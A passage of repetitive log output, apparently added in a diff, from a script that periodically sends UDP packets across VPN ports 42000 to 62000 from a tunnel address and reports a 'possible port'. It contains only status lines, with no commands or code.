1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:39:05 +Starting port fill at 2020-09-06 04:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:40:07 +Starting port fill at 2020-09-06 04:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:41:05 +Starting port fill at 2020-09-06 04:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:42:05 +Starting port fill at 2020-09-06 04:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:43:05 +Starting port fill at 2020-09-06 04:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:44:05 +Starting port fill at 2020-09-06 04:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:45:05 +Starting port fill at 2020-09-06 04:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:46:07 +Starting port fill at 2020-09-06 04:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:47:06 +Starting port fill at 2020-09-06 04:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:48:06 +Starting port fill at 2020-09-06 04:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:49:04 +Starting port fill at 2020-09-06 04:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:50:04 +Starting port fill at 2020-09-06 04:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:51:04 +Starting port fill at 2020-09-06 04:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:52:05 +Starting port fill at 2020-09-06 04:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:53:06 +Starting port fill at 2020-09-06 04:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:54:06 +Starting port fill at 2020-09-06 04:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:55:05 +Starting port fill at 2020-09-06 04:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:56:05 +Starting port fill at 2020-09-06 04:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:57:05 +Starting port fill at 2020-09-06 04:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:58:06 +Starting port fill at 2020-09-06 04:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 04:59:06 +Starting port fill at 2020-09-06 05:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 